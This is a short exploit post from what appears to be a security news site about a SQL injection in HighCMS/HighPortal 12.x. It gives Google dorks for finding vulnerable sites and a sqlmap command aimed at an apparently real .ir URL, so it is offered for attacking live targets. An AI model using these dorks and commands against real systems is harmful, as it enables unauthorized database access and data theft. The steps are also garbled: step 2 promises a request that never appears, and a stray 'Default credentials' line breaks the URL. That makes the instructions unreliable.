Home Tools Exploits & CVE's HighCMS/HighPortal 12.x SQL Injection

HighCMS/HighPortal 12.x SQL Injection

May 16, 2022

693

HighCMS/HighPortal version 12.x appears to suffer from a remote SQL injection vulnerability.

# Exploit Title: HighCMS/HighPortal v12.x SQL Inj
# Type : WEBAPPS "HighCMS/HighPortal"
# Platform :  ASP.NET
# Date :  4/23/2022
# Exploit Author :  E1.Coders
# Software Link :  https://aryanic.com/page/portal
# Version :  v12.x
# Category :  Webapps
# Tested on: Linux/Windows
# Google Dork: inurl:index.jsp?siteid=1&fkeyid=&siteid=1&pageid=

# Google Dork: <©2022 HighCMS/HighPortal"

Step 1: Enter the address of the "page" that has the problem of sql injection attacks  
http: //TARGET/index.jsp? Siteid = 1 & fkeyid = & siteid = 1 & pageid = 6528 Default credentials.      ( is True )
STEP 2 : Send the following request "
or
Use sqlmap : python sqlmap.py -u "https://example.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211"

HighCMS/HighPortal 12.x SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object...

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Cyberoam NetGenie Cross Site Scripting

Osprey Pump Controller 1.0.1 eventFileSelected Command Injection

EasyAnswer 1.0.1 Cross Site Request Forgery